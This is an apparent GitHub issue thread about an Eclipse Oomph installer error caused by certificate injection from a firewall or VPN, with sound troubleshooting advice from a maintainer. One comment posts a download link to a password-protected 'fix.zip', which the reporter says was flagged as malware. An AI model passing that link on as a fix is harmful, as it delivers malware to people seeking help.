### ISSUE TITLE
Problem with Installer Build 606 Version 1.33.0

### ISSUE THREAD

**Issue by adrianopmaia** [eclipse-oomph/oomph#102]
I have first considered [asking a question](https://www.eclipse.org/setups/installer/question?version=1.33.0+Build+606).

I understand that without details about the problem and how to reproduce the problem, no one can fix a problem for me.  Therefore I have clicked on the `Show Log` link on the red banner and have pasted the log details here:
```
Log Details...
```
![image](https://github.com/user-attachments/assets/caa30e4e-d44f-4225-84ce-033e0f3d6d1f)

WIndows 11 Pro 23H2

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by adrianopmaia** [comment]
Didn't work, flagged as malware
Adriano Pedrosa MaiaBacharel em Ciência da ComputaçãoUniversidade Federal de Ouro Preto 

    On Monday, August 26, 2024 at 11:06:44 AM GMT-3, sunshinezxq ***@***.***> wrote:  
 
 


Download
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by merks** [comment]
This is generally caused when you are behind a firewall, that firewall injects a certificates into the network traffic, and that certificate are not rooted in one of the root cacerts of the JRE.

Have you ever had to add keys to your Java's installation's cacerts?   Maybe the cacerts of the JRE installed on your system have been updated.  

You can get installers **without** an embedded JRE here and these will use the default JRE of your system.

https://download.eclipse.org/justj/?file=oomph/epp/2024-06/R

I.e., these two:

![image](https://github.com/user-attachments/assets/bb3a8a09-c40f-4afe-8918-027e8176553a)

You can also download a package:

https://www.eclipse.org/downloads/packages/

But you will not be able to update or installer new software on these for exactly the same reason.

The certificate chain can viewed in a browser and can be export to *.pem so that one can use keytool.exe -import -alias some-alias cacerts -file xyz.pem to add it to each JDK's cacerts.  I had to do this last month for a client.    I hope I remember how to do it the next time.  Google this:
```
java add certificate to cacert
```

**Comment by adrianopmaia** [comment]
in the end, i disabled my VPN, instaled, and re enabled again

**Comment by merks** [comment]
I suspect the latest installer just works for this scenario now because of this change:

https://github.com/eclipse-oomph/oomph/commit/e86bb9282e0f3474a8d8b9bb1f046e916eb079ff
